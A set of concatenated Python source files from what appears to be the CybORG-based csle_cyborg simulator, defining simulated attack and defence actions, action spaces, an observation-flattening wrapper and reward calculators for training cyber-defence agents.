class RemoteCodeExecution(MSFAction):
    def __init__(self, session, agent):
        super().__init__(session, agent)

    def sim_execute(self, state):
        pass



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.shell_action import ShellAction


class CredentialHarvesting(ShellAction):
    def __init__(self, session, agent):
        super().__init__(session, agent)

    def sim_execute(self, state):
        pass


from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.actions.concrete_actions.blue_keep import BlueKeep
from csle_cyborg.shared.actions.concrete_actions.eternal_blue import EternalBlue
from csle_cyborg.shared.actions.concrete_actions.http_rfi import HTTPRFI
from csle_cyborg.shared.actions.concrete_actions.http_srfi import HTTPSRFI
from csle_cyborg.shared.actions.concrete_actions.ssh_brute_force import SSHBruteForce
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import lo
from csle_cyborg.simulator.session import GreenAbstractSession
from csle_cyborg.simulator.state import State


class GreenConnection(Action):
    def __init__(self, session: int, agent: str, hostname: str):
        super().__init__()
        self.hostname = hostname
        self.agent = agent
        self.session = session

    def sim_execute(self, state: State) -> Observation:
        # find session inside or close to the target subnet
        session = self.session
        # Find ip address of host
        ip_map = state.ip_addresses
        for ip in ip_map:
            if ip_map[ip] == self.hostname:
                self.ip_address = ip
                break

        if type(state.sessions[self.agent][self.session]) is GreenAbstractSession and self.ip_address in \
                state.sessions[self.agent][self.session].ports:
            ports = state.sessions[self.agent][self.session].ports[self.ip_address]
            exploit_options = {EternalBlue: 2.0 if 139 in ports else 0.0,
                               BlueKeep: 1.0 if 3389 in ports else 0.0,
                               HTTPRFI: 3.0 if 80 in ports else 0.0,
                               HTTPSRFI: 4.0 if 443 in ports else 0.0,
                               SSHBruteForce: 0.1 if 22 in ports else 0.0}
            # use information to populate weights for which exploit to select

            # sample the exploit to perform from the exploit weights
            sub_action = list(exploit_options.keys())[
                list(exploit_options.values()).index(max(list(exploit_options.values())))](session=self.session,
                                                                                           agent=self.agent,
                                                                                           ip_address=self.ip_address,
                                                                                           target_session=session)
            obs = sub_action.sim_execute(state)
            if self.ip_address != lo and obs.data['success'] == True:
                hostname = obs.data[str(self.ip_address)]["System info"]["Hostname"]
                os = obs.data[str(self.ip_address)]["System info"]["OSType"]
                state.sessions[self.agent][self.session].addos(hostname, os)
        else:
            obs = Observation(success=False)
        return obs

    def __str__(self):
        return f"{self.__class__.__name__} {self.ip_address}"



import inspect
from csle_cyborg.main import Main

# for visualisation of code profile:
# python -m cProfile -o profile.pstats profiler.py
# gprof2dot -f pstats profile.pstats | dot -Tpng -o output.png && eog output.png
# from CybORG.CybORG import AWSConfig


def run():
    aws = True
    if not aws:
        c = Main(path, 'sim')
    else:
        raise ValueError("Aws not supported")
    try:
        for i in range(1):
            c.start(50)
            # c.reset()
    finally:
        c.shutdown(teardown=True)
path = str(inspect.getfile(Main))
path = path[:-7] + '/Shared/Scenarios/Scenario1.yaml'
# cProfile.run("run()", sort='cumtime')
run()






# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.shared.actions.action import Sleep


class SleepAgent(BaseAgent):
    def __init__(self):
        pass

    def train(self, results):
        pass

    def get_action(self, observation, action_space):
        return Sleep()

    def end_episode(self):
        pass

    def set_initial_values(self, action_space, observation):
        pass



# Copyright DST Group. Licensed under the MIT license.

import sys
from inspect import signature
from csle_cyborg.shared.enums import SessionType

MAX_SUBNETS = 10
MAX_ADDRESSES = 10
MAX_SESSIONS = 8
MAX_USERNAMES = 10
MAX_PASSWORDS = 10
MAX_PROCESSES = 50
MAX_PORTS = 50
MAX_GROUPS = 15
MAX_FILES = 20
MAX_PATHS = 20


class ActionSpace:

    def __init__(self, actions, agent, allowed_subnets):
        # load in the stuff that the agent is allowed to know about

        # save all params
        self.actions = {i: True for i in self.get_action_classes(actions)}
        self.action_params = {}
        for action in self.actions:
            self.action_params[action] = signature(action).parameters
        self.allowed_subnets = allowed_subnets
        self.subnet = {}
        self.ip_address = {}
        self.server_session = {}
        self.client_session = {i: False for i in range(MAX_SESSIONS)}
        self.username = {}
        self.password = {}
        self.process = {}
        self.port = {}
        self.hostname = {}
        self.agent = {agent: True}

    def get_name(self, action: int) -> str:
        pass

    def get_action_classes(self, actions):
        action_classes = []
        action_module = sys.modules['csle_cyborg.shared.actions']
        for action in actions:
            action_classes.append(getattr(action_module, action))
        return action_classes

    def get_max_action_space(self):
        max_action = {
            'action': len(self.actions),
            'subnet': MAX_SUBNETS,
            'ip_address': MAX_ADDRESSES,
            'session': MAX_SESSIONS,
            'username': MAX_USERNAMES,
            'password': MAX_PASSWORDS,
            'process': MAX_PROCESSES,
            'port': MAX_PORTS,
            'target_session': MAX_SESSIONS}
        return max_action

    def get_action_space(self):
        max_action = {
            'action': self.actions,
            'subnet': self.subnet,
            'ip_address': self.ip_address,
            'session': self.server_session,
            'username': self.username,
            'password': self.password,
            'process': self.process,
            'port': self.port,
            'target_session': self.client_session,
            'agent': self.agent,
            'hostname': self.hostname
        }
        return max_action

    def reset(self, agent):
        self.subnet = {}
        self.ip_address = {}
        self.server_session = {}
        self.client_session = {i: False for i in range(MAX_SESSIONS)}
        self.username = {}
        self.password = {}
        self.process = {}
        self.port = {}
        self.agent = {agent: True}

    def get_max_actions(self, action):
        params = self.action_params[action]
        size = 1
        for param in params.keys():
            if param == "session":
                size *= len(self.server_session)
            elif param == "target_session":
                size *= len(self.client_session)
            elif param == "subnet":
                size *= len(self.subnet)
            elif param == "ip_address":
                size *= len(self.ip_address)
            elif param == "username":
                size *= len(self.username)
            elif param == "password":
                size *= len(self.password)
            elif param == "process":
                size *= len(self.process)
            elif param == "port":
                size *= len(self.port)
            elif param == "agent":
                size *= len(self.agent)
            else:
                raise NotImplementedError(
                    f"Param '{param}' in action '{action.__name__}' has no"
                    " code to parse its size for action space"
                )
        return size

    def update(self, observation: dict, known: bool = True):
        if observation is None:
            return
        for key, info in observation.items():
            if key == "success" or key == 'Valid' or key == 'action':
                continue
            if not isinstance(info, dict):
                continue
            if "System info" in info:
                if "Hostname" in info["System info"]:
                    self.hostname[info["System info"]["Hostname"]] = known
            if "Interface" in info:
                for interface in info["Interface"]:
                    if "Subnet" in interface:
                        self.subnet[interface["Subnet"]] = known
                    if "IP Address" in interface:
                        self.ip_address[interface["IP Address"]] = known

            if "Processes" in info:
                for process in info["Processes"]:
                    if "PID" in process:
                        self.process[process["PID"]] = known
                    if "Connections" in process:
                        for connection in process["Connections"]:
                            if "local_port" in connection:
                                self.port[connection["local_port"]] = known
                            if "remote_port" in connection:
                                self.port[connection["remote_port"]] = known

            if "User Info" in info:
                for user in info["User Info"]:
                    if "Username" in user:
                        self.username[user["Username"]] = known
                    if "Password" in user:
                        self.password[user["Password"]] = known

            if "Sessions" in info:
                for session in info["Sessions"]:
                    if "ID" in session and session['Agent'] in self.agent:
                        if "Type" in session and (session["Type"] == SessionType.MSF_SERVER or session[
                            "Type"] == SessionType.VELOCIRAPTOR_SERVER or session[
                                                      "Type"] == SessionType.RED_ABSTRACT_SESSION or session[
                                                      "Type"] == SessionType.GREY_SESSION):
                            self.server_session[session["ID"]] = known

                        self.client_session[session["ID"]] = known



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.internal_enumeration_folder.internal_enumeration import InternalEnumeration


class HostInfoEnumeration(InternalEnumeration):

    def __init__(self, session: int, agent: str = None):
        super().__init__(session, agent)

    def sim_execute(self, state):
        pass



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.session import Session


class MSFServerSession(Session):

    def __init__(self, ident: str, host: str, user: str, agent: str,
                 process: Process, timeout: int = 0, session_type: str = 'msf server', name=None):
        super().__init__(ident, host, user, agent,
                 process, timeout, session_type, name=name)
        self.routes = {}  # routes have the structure sessionid: subnet

    def dead_child(self, child_id: int):
        super().dead_child(child_id)
        if child_id in self.routes:
            self.routes.pop(child_id)



from ipaddress import IPv4Address

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.exploit_action import ExploitAction
from csle_cyborg.shared.enums import OperatingSystemPatch, OperatingSystemType, OperatingSystemDistribution
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.state import State


class BlueKeep(ExploitAction):
    def __init__(self, session: int, agent: str, ip_address: IPv4Address, target_session: int):
        super().__init__(session, agent, ip_address, target_session)

    def sim_execute(self, state: State) -> Observation:
        return self.sim_exploit(state, 3389, 'rdp')

    def test_exploit_works(self, target_host: Host, vuln_proc: Process):
        # the exact patches and OS distributions are described here:
        # https://borncity.com/win/2019/06/06/how-to-bluekeep-check-for-windows/
        works = target_host.os_type == OperatingSystemType.WINDOWS and \
                ((OperatingSystemPatch.KB4500331 not in target_host.patches
                  and (target_host.distribution == OperatingSystemDistribution.WINDOWS_XP
                       or target_host.distribution == OperatingSystemDistribution.WINDOWS_SVR_2003SP2))
                 or (OperatingSystemPatch.KB4499149 not in target_host.patches
                     and OperatingSystemPatch.KB4499180 not in target_host.patches
                     and (target_host.distribution == OperatingSystemDistribution.WINDOWS_VISTA
                          or target_host.distribution == OperatingSystemDistribution.WINDOWS_SVR_2008SP1))
                 or (OperatingSystemPatch.KB4499164 not in target_host.patches
                     and OperatingSystemPatch.KB4499175 not in target_host.patches
                     and (target_host.distribution == OperatingSystemDistribution.WINDOWS_SVR_2008R2
                          or target_host.distribution == OperatingSystemDistribution.WINDOWS_7SP1)))

        works = True
        return works



from ipaddress import IPv4Address

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import lo
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.state import State


class Portscan(ConcreteAction):
    def __init__(self, session: int, agent: str, ip_address: IPv4Address, target_session: int):
        super().__init__(session, agent)
        self.ip_address = ip_address
        self.target_session = target_session

    def sim_execute(self, state: State) -> Observation:
        self.state = state
        obs = Observation()
        if self.session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        from_host = state.sessions['Red'][self.session].host
        session = state.sessions['Red'][self.session]

        if not session.active:
            obs.set_success(False)
            return obs
        if self.ip_address == lo:
            target_host: Host = state.hosts[from_host]
            ports = ['all']
        else:
            target_host: Host = state.hosts[state.ip_addresses[self.ip_address]]
            ports = self.check_routable([state.subnets[i.subnet] for i in state.hosts[from_host].interfaces if i.ip_address != lo], [s for s in state.subnets.values() if self.ip_address in s.cidr])

        if ports is None or ports == []:
            obs.set_success(False)
            return obs

        obs.set_success(True)

        for process in target_host.processes:
            for conn in process.connections:
                if 'local_port' in conn and (conn['local_port'] in ports or 'all' in ports) and 'remote_port' not in conn:
                    from_subnet, to_subnet = ports[conn['local_port']] if conn['local_port'] in ports else ports['all']
                    # calculate the originating ip address
                    for i in state.hosts[from_host].interfaces:
                        if i.ip_address != lo:
                            if i.subnet == from_subnet:
                                originating_ip_address = i.ip_address
                    # internal so avoids nacls
                    obs.add_process(hostid=str(self.ip_address), local_port=conn["local_port"], local_address=self.ip_address)
                    target_host.events['NetworkConnections'].append({'local_address': self.ip_address,
                                                                     'local_port': conn["local_port"],
                                                                     'remote_address': originating_ip_address,
                                                                     'remote_port': target_host.get_ephemeral_port()})
        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.global_actions.global_action import GlobalAction


class ListGames(GlobalAction):
    """Get a list of all active games """

    def emu_execute(self, team_server) -> Observation:
        self._log_info("Listing games")
        obs = Observation()
        game_ids = team_server.get_games_list()
        obs.set_success(True)
        obs.add_key_value("game_ids", game_ids)
        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action


class AgentAction(Action):
    """Abstract class for an agent level action.

    An agent action is one that operates within the context of a single
    scenario/game instance, within an single agent, but outside of a
    single session.

    Examples would be:
    - creating a new session
    - terminating a session
    - listing available sessions in a game
    """

    def emu_execute(self, agent, *args, **kwargs) -> Observation:
        raise NotImplementedError



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.shell_action import ShellAction
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.shared.observation import Observation


class KillProcessWindows(ShellAction):
    # taskkill /PID  processId
    def __init__(self, session, process, agent):
        super().__init__(session, agent)
        self.process = process

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        if not state.sessions[self.agent][self.session].active:
            return obs

        host = state.sessions[self.agent][self.session].host
        obs.add_system_info(hostid="hostid0", os_type=host.os_type)
        if host.os_type == OperatingSystemType.WINDOWS:
            process = host.get_process(self.process)
            if process is not None:
                obs.set_success(True)
                host.processes.remove(process)
                session, agent = host.get_session(pid=self.process)
                if session is not None:
                    host.sessions[agent].remove(session)
                    state.sessions[agent].pop(session.ident)
            else:
                obs.set_success(False)
        else:
            obs.set_success(False)
        return obs


from datetime import datetime
from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.shared.actions.shell_actions_folder.shell_sleep import ShellSleep
from csle_cyborg.shared.enums import OperatingSystemType, SessionType, ProcessName, Path, ProcessType, ProcessVersion, \
    AppProtocol, FileType, ProcessState, Vulnerability, Vendor, PasswordHashType, BuiltInGroups, \
    OperatingSystemDistribution, OperatingSystemVersion, OperatingSystemKernelVersion, Architecture, \
    OperatingSystemPatch, FileVersion

import inspect, random


class FixedFlatWrapper(BaseWrapper):
    def __init__(self, env: BaseWrapper = None, agent=None):
        super().__init__(env, agent)
        self.MAX_HOSTS = 5
        self.MAX_PROCESSES = 100
        self.MAX_CONNECTIONS = 2
        self.MAX_VULNERABILITIES = 1
        self.MAX_INTERFACES = 4
        self.MAX_FILES = 10
        self.MAX_SESSIONS = 20
        self.MAX_USERS = 10
        self.MAX_GROUPS = 10
        self.MAX_PATCHES = 10
        self.hostname = {}
        self.username = {}
        self.group_name = {}
        self.process_name = {}
        self.interface_name = {}
        self.path = {}
        self.password = {}
        self.password_hash = {}
        self.file = {}

    def get_action(self, observation, action_space):

        action = self.agent.get_action(self.observation_change(observation), self.action_space_change(action_space))

        action_class = action['action']
        params = {}
        for p in inspect.signature(action_class).parameters:
            if p in action:
                params[p] = action[p]
            else:
                action_class = ShellSleep
                params = {}
                break
        action = action_class(**params)
        return action

    # def action_space_change(self, action_space: dict) -> dict:
    #     action_space.pop('process')
    #     action_space['session'] = {0: True}
    #     action_space['username'] = {'pi': action_space['username']['pi'],
    #                                 'vagrant': action_space['username']['vagrant']}
    #     action_space['password'] = {'raspberry': action_space['password']['raspberry'],
    #                                 'vagrant': action_space['password']['vagrant']}
    #     action_space['port'] = {22: action_space['port'][22]}
    #     return action_space

    def observation_change(self, obs: dict) -> list:
        numeric_obs = obs
        flat_obs = []
        while len(numeric_obs) < self.MAX_HOSTS:
            hostid = str(random.randint(0, self.MAX_HOSTS + 1))
            if hostid not in numeric_obs.keys():
                numeric_obs[hostid] = {}

        while len(numeric_obs) > self.MAX_HOSTS:
            numeric_obs.popitem()
            # raise ValueError("Too many hosts in observation for fixed size")

        for key_name, host in numeric_obs.items():
            if key_name == 'success':
                flat_obs.append(float(host.value) / 3)
            elif not isinstance(host, dict):
                raise ValueError('Host data must be a dict')
            else:
                if 'System info' in host:
                    if "Hostname" in host["System info"]:
                        element = host["System info"]["Hostname"]
                        if element not in self.hostname:
                            self.hostname[element] = len(self.hostname)
                        element = self.hostname[element] / self.MAX_HOSTS
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)
                    if "OSType" in host["System info"]:
                        if host["System info"]["OSType"] != -1:
                            element = host["System info"]["OSType"].value / len(OperatingSystemType.__members__)
                        else:
                            element = -1

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "OSDistribution" in host["System info"]:
                        if host["System info"]["OSDistribution"] != -1:
                            element = host["System info"]["OSDistribution"].value / len(
                                OperatingSystemDistribution.__members__)
                        else:
                            element = -1

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "OSVersion" in host["System info"]:
                        if host["System info"]["OSVersion"] != -1:
                            element = host["System info"]["OSVersion"].value / len(OperatingSystemVersion.__members__)
                        else:
                            element = -1

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "OSKernelVersion" in host["System info"]:
                        if host["System info"]["OSKernelVersion"] != -1:
                            element = host["System info"]["OSKernelVersion"].value / len(
                                OperatingSystemKernelVersion.__members__)
                        else:
                            element = -1

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Architecture" in host["System info"]:
                        if host["System info"]["Architecture"] != -1:
                            element = host["System info"]["Architecture"].value / len(Architecture.__members__)
                        else:
                            element = -1

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if 'Local Time' in host["System info"]:
                        element = (host["System info"]['Local Time'] - datetime(2020, 1, 1)).total_seconds()

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "os_patches" not in host["System info"]:
                        host["System info"]["os_patches"] = []

                    while len(host["System info"]["os_patches"]) < self.MAX_PATCHES:
                        host["System info"]["os_patches"].append(-1.0)
                    if len(host["System info"]["os_patches"]) > self.MAX_PATCHES:
                        raise ValueError("Too many processes in observation for fixed size")
                    for patch_idx, patch in enumerate(host["System info"]["os_patches"]):
                        if patch != -1:
                            element = patch.value / len(OperatingSystemPatch.__members__)
                        else:
                            element = patch

                        flat_obs.append(float(element))
                else:
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    flat_obs.append(-1.0)
                    for num_patches in range(self.MAX_PATCHES):
                        flat_obs.append(-1.0)

                if 'Processes' not in host:
                    host["Processes"] = []
                while len(host["Processes"]) < self.MAX_PROCESSES:
                    host["Processes"].append({})
                while len(host["Processes"]) > self.MAX_PROCESSES:
                    host["Processes"].pop()
                    # raise ValueError("Too many processes in observation for fixed size")

                for proc_idx, process in enumerate(host['Processes']):
                    if "PID" in process:
                        flat_obs.append(float(process["PID"]) / 32768)
                    else:
                        flat_obs.append(-1.0)

                    if "PPID" in process:
                        flat_obs.append(float(process["PPID"]) / 32768)
                    else:
                        flat_obs.append(-1.0)

                    if "Process Name" in process:
                        element = process["Process Name"]
                        if element not in self.process_name:
                            self.process_name[element] = len(self.process_name)
                        element = self.process_name[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Username" in process:
                        element = process["Username"]
                        if element not in self.username:
                            self.username[element] = len(self.username)
                        element = self.username[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Path" in process:
                        element = process["Path"]
                        if element not in self.path:
                            self.path[element] = len(self.path)
                        element = self.path[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Known Process" in process:
                        if process["Known Process"] != -1:
                            element = process["Known Process"].value / len(ProcessName.__members__)
                        else:
                            element = -1.0

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Known Path" in process:
                        if process["Known Path"] != -1:
                            element = process["Known Path"].value / len(Path.__members__)
                        else:
                            element = -1.0

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Process Type" in process:
                        if process["Process Type"] != -1:
                            element = process["Process Type"].value / len(ProcessType.__members__)
                        else:
                            element = -1.0

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Process Version" in process:
                        if process["Process Version"] != -1:
                            element = process["Process Version"].value / len(ProcessVersion.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Connections" not in process:
                        process["Connections"] = []
                    while len(process["Connections"]) < self.MAX_CONNECTIONS:
                        process["Connections"].append({})

                    for conn_idx, connection in enumerate(process["Connections"]):
                        if "local_port" in connection:
                            flat_obs.append(float(connection["local_port"]) / 65535)
                        else:
                            flat_obs.append(-1.0)

                        if "remote_port" in connection:
                            flat_obs.append(float(connection["remote_port"]) / 65535)
                        else:
                            flat_obs.append(-1.0)

                        if "local_address" in connection:
                            element = int(connection["local_address"])
                            flat_obs.append(float(element) / 4294967296)
                        else:
                            flat_obs.append(-1.0)

                        if "Remote Address" in connection:
                            element = int(connection["Remote Address"])
                            flat_obs.append(float(element) / 4294967296)
                        else:
                            flat_obs.append(-1.0)

                        if "Application Protocol" in connection:
                            if connection["Application Protocol"] != -1:
                                element = connection["Application Protocol"].value / len(AppProtocol.__members__)
                            else:
                                element = -1.0
                            flat_obs.append(float(element))
                        else:
                            flat_obs.append(-1.0)

                        if "Status" in connection:
                            if connection["Status"] != -1:
                                element = connection["Status"].value / len(ProcessState.__members__)
                            else:
                                element = -1.0
                            flat_obs.append(float(element))
                        else:
                            flat_obs.append(-1.0)

                    if "Vulnerability" in process:
                        for idx, element in enumerate(process["Vulnerability"]):
                            if element != -1:
                                element = element.value / len(Vulnerability.__members__)
                            flat_obs.append(float(element))
                    else:
                        for idx in range(self.MAX_VULNERABILITIES):
                            flat_obs.append(-1.0)

                if "Files" not in host:
                    host["Files"] = []
                while len(host["Files"]) < self.MAX_FILES:
                    host["Files"].append({})
                while len(host["Files"]) > self.MAX_FILES:
                    host["Files"].pop()
                    # raise ValueError("Too many files in observation for fixed size")

                for file_idx, file in enumerate(host['Files']):
                    if "Path" in file:
                        element = file["Path"]
                        if element not in self.path:
                            self.path[element] = len(self.path)
                        element = self.path[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Known Path" in file:
                        if file["Known Path"] != -1:
                            element = file["Known Path"].value / len(Path.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "File Name" in file:
                        element = file["File Name"]
                        if element not in self.file:
                            self.file[element] = len(self.file)
                        element = self.file[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Known File" in file:
                        if file["Known File"] != -1:
                            element = file["Known File"].value / len(FileType.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Type" in file:
                        if file["Type"] != -1:
                            element = file["Type"].value / len(FileType.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Vendor" in file:
                        if file["Vendor"] != -1:
                            element = file["Vendor"].value / len(Vendor.__members__)
                        else:
                            element = -1.0

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Version" in file:
                        if file["Version"] != -1:
                            element = file["Version"].value / len(FileVersion.__members__)
                        else:
                            element = -1.0

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Username" in file:
                        element = file["Username"]
                        if element not in self.username:
                            self.username[element] = len(self.username)
                        element = self.username[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Group Name" in file:
                        element = file["Group Name"]
                        if element not in self.group_name:
                            self.group_name[element] = len(self.group_name)
                        element = self.group_name[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Last Modified Time" in file:
                        # TODO work out how to normalise this value
                        element = -1  # (file["Last Modified Time"] - datetime(2020, 1, 1)).total_seconds()

                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "User Permissions" in file:
                        element = file["User Permissions"]
                        flat_obs.append(float(element) / 7)
                    else:
                        flat_obs.append(-1.0)

                    if "Group Permissions" in file:
                        element = file["Group Permissions"]
                        flat_obs.append(float(element) / 7)
                    else:
                        flat_obs.append(-1.0)

                    if "Default Permissions" in file:
                        element = file["Default Permissions"]
                        flat_obs.append(float(element) / 7)
                    else:
                        flat_obs.append(-1.0)

                if "Users" not in host:
                    host["Users"] = []
                while len(host["Users"]) < self.MAX_USERS:
                    host["Users"].append({})
                while len(host["Users"]) > self.MAX_USERS:
                    host["Users"].pop()
                    # raise ValueError("Too many users in observation for fixed size")

                for user_idx, user in enumerate(host['Users']):
                    if "Username" in user:
                        element = user["Username"]
                        if element not in self.username:
                            self.username[element] = len(self.username)
                        element = self.username[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Password" in user:
                        element = user["Password"]
                        if element not in self.password:
                            self.password[element] = len(self.password)
                        element = self.password[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Password Hash" in user:
                        element = user["Password Hash"]
                        if element not in self.password_hash:
                            self.password_hash[element] = len(self.password_hash)
                        element = self.password_hash[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Password Hash Type" in user:
                        if user["Password Hash Type"] != -1:
                            element = user["Password Hash Type"].value / len(PasswordHashType.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "UID" in user:
                        flat_obs.append(float(user["UID"]))
                    else:
                        flat_obs.append(-1.0)

                    if "Logged in" in user:
                        flat_obs.append(float(user["Logged in"]))
                    else:
                        flat_obs.append(-1.0)

                    if "Groups" not in user:
                        user["Groups"] = []
                    while len(user["Groups"]) < self.MAX_GROUPS:
                        user["Groups"].append({})
                    while len(user['Groups']) > self.MAX_GROUPS:
                        user['Groups'].pop()
                        # raise ValueError("Too many groups in observation for fixed size")
                    for group_idx, group in enumerate(user["Groups"]):
                        if 'Builtin Group' in group:
                            if group["Builtin Group"] != -1:  # TODO test if this is ever not true
                                element = group["Builtin Group"].value / len(BuiltInGroups.__members__)
                            else:
                                element = -1.0
                            flat_obs.append(float(element))
                        else:
                            flat_obs.append(-1.0)

                        if "Group Name" in group:
                            element = user["Group Name"]
                            if element not in self.group_name:
                                self.group_name[element] = len(self.group_name)
                            element = self.group_name[element]
                            flat_obs.append(float(element))
                        else:
                            flat_obs.append(-1.0)

                        if "GID" in group:
                            flat_obs.append(float(group["GID"]))
                        else:
                            flat_obs.append(-1.0)

                if "Sessions" not in host:
                    host["Sessions"] = []
                while len(host["Sessions"]) < self.MAX_SESSIONS:
                    host["Sessions"].append({})
                while len(host["Sessions"]) > self.MAX_SESSIONS:
                    host["Sessions"].pop()
                    # raise ValueError("Too many sessions in observation for fixed size")

                for session_idx, session in enumerate(host['Sessions']):
                    if "Username" in session:
                        element = session["Username"]
                        if element not in self.username:
                            self.username[element] = len(self.username)
                        element = self.username[element]
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "Type" in session:
                        if session["Type"] != -1:
                            element = session["Type"].value / len(SessionType.__members__)
                        else:
                            element = -1.0
                        flat_obs.append(float(element))
                    else:
                        flat_obs.append(-1.0)

                    if "ID" in session:
                        flat_obs.append(float(session["ID"]) / 20)
                    else:
                        flat_obs.append(-1.0)

                    if "Timeout" in session:
                        flat_obs.append(float(session["Timeout"]))
                    else:
                        flat_obs.append(-1.0)

                    if "PID" in session:
                        flat_obs.append(float(session["PID"]) / 32768)
                    else:
                        flat_obs.append(-1.0)

                if 'Interface' not in host:
                    host["Interface"] = []
                while len(host["Interface"]) < self.MAX_INTERFACES:
                    host["Interface"].append({})
                while len(host["Interface"]) > self.MAX_INTERFACES:
                    host["Interface"].pop()
                    # raise ValueError("Too many interfaces in observation for fixed size")

                if 'Interface' in host:
                    for interface_idx, interface in enumerate(host['Interface']):
                        if "Interface Name" in interface:
                            element = interface["Interface Name"]
                            if element not in self.interface_name:
                                self.interface_name[element] = len(self.interface_name)
                            element = self.interface_name[element]
                            flat_obs.append(float(
                                element))
                        else:
                            flat_obs.append(-1.0)

                        if "Subnet" in interface:
                            element = interface["Subnet"]
                            flat_obs.append(float(int(element.network_address)) / 4294967296)
                            flat_obs.append(float(int(element.prefixlen)) / 4294967296)
                        else:
                            flat_obs.append(-1.0)
                            flat_obs.append(-1.0)

                        if "IP Address" in interface:
                            element = int(interface["IP Address"])
                            flat_obs.append(float(element) / 4294967296)
                        else:
                            flat_obs.append(-1.0)

        return flat_obs

    def get_attr(self, attribute: str):
        return self.env.get_attr(attribute)

    def get_observation(self, agent: str):
        obs = self.get_attr('get_observation')(agent)
        return self.observation_change(obs)



from collections import namedtuple

from csle_cyborg.shared.scenario import Scenario
from csle_cyborg.shared.red_reward_calculator import DistruptRewardCalculator, PwnRewardCalculator
from csle_cyborg.shared.reward_calculator import RewardCalculator

HostReward = namedtuple('HostReward', 'confidentiality availability')


class ConfidentialityRewardCalculator(RewardCalculator):
    # Calculate punishment for defending agent based on compromise of hosts/data
    def __init__(self, agent_name: str, scenario: Scenario):
        self.scenario = scenario
        self.adversary = scenario.get_agent_info(agent_name).adversary
        super(ConfidentialityRewardCalculator, self).__init__(agent_name)
        self.infiltrate_rc = PwnRewardCalculator(self.adversary, scenario)
        self.compromised_hosts = {}

    def reset(self):
        self.infiltrate_rc.reset()

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool) -> float:
        self.compromised_hosts = {}
        reward = -self.infiltrate_rc.calculate_reward(current_state, action, agent_observations, done)
        self._calculate_compromised_hosts()
        return reward

    def _calculate_compromised_hosts(self):
        for host, value in self.infiltrate_rc.compromised_hosts.items():
            self.compromised_hosts[host] = -1 * value


class AvailabilityRewardCalculator(RewardCalculator):
    # Calculate punishment for defending agent based on reduction in availability
    def __init__(self, agent_name: str, scenario: Scenario):
        super(AvailabilityRewardCalculator, self).__init__(agent_name)
        self.adversary = scenario.get_agent_info(agent_name).adversary
